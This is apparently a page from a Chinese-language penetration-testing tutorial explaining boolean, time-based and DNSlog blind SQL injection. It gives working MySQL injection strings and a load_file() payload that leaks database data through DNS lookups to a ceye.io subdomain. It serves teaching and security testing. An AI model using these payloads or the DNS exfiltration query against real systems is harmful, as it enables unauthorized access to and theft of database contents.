## 盲注
當我們的注入語句被帶入數據庫查詢,頁面確不能回顯我們的結果,如應用程序就會返回一個“通用的”的頁面或特定的語句,我們不能以此來判斷注入是否成功,這種情況下就要用到sql盲注的技巧了。
sql盲注三個分類:
1. 布爾盲注
2. 時間盲注
3. dnslog盲注
## 布爾盲注
### 布爾盲注原理
只返回布爾值的sql注入漏洞,通過構造語句,來判斷數據庫信息的正確性,再通過頁面反回的布爾值,來判斷正確與否
### 布爾盲注方法
~~~sql
#substr()函數,截取某個字符串,與后面的字符串或數字對比
k' and substr((select database()),1,1)='s'
#left()函數,截取前幾個字符與期望值對比
k' and left((database()),1)='s'
#regexp函數,用正則判斷
k' and select user() regexp '^r'
#like函數
k' and select user() like 'ro%'
# 爆破庫、表、字段長度
k' and select length(database())<xx
?
#有些sql漏洞中,會屏蔽引號,因此更多采用將截取出來的字符串轉為ascii碼,再對比ascii碼值
#ascii和ord函數功能相同,大于、小于、等于配合二分法使用
k' and ascii(substr((select database()),1,1))=114
k' and ascii(substr((select database()),1,1))>114
k' and ascii(substr((select database()),1,1))<20
ord(substr((select database()),1,1))=114
~~~
## 時間盲注
### 時間盲注原理
語句執行后,不回顯,不報錯,不提示真假的sql注入漏洞。可以通過構造語句,通過條件語句判斷,為真則立即執行,否則延時執行
~~~sql
#確實是否有注入點,如果相應時間是自定義的睡眠時間,則大概率有注入點
k' and sleep(x) #
#然后通過之前的函數,猜測庫、表、字段
k' and if(ascii(substr(database(),1,1))>115,0,sleep(5));
#也可以先通過sleep計算出庫、表、字段長度
k' and sleep(length(database()))
~~~
## dnslog盲注
### dnslog盲注原理
1. 首先需要存在sql注入漏洞,但不回顯,常規只能用布爾盲注和時間盲注猜單詞
2. 但是利用`Mysql load_file()`函數(唯windowns),可以用sql語句發起web請求
3. 將我們盲注需要獲取的信息,通過二級域名的方式,發起web請求
4. 利用特定的dns解析網站,獲取這些二級域名的記錄,就能得到數據
前提要求
1. windows系統
2. 該用戶具有file權限
3. `SHOW VARIABLES LIKE 'secure_file_priv'`結果為NULL
### dnslog盲注方法
登錄`http://ceye.io/`網站并注冊,得到屬于自己的identifier 先嘗試在終端運行`curl test.xxxx.ceye.io` ,在解析記錄就可以看到對應記錄 在windows系統下,使用`load_file()`發起如下類似請求:
~~~
select load_file(concat('\\\\',(select version()),'.xxxx.ceye.io\\abc'))
~~~
如果解析記錄有結果,后續就可以用sql注入的其他語法自由發揮了 有些特殊符號不能作為二級域名,通用的方法是用`hex()`轉換為16進制處理
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具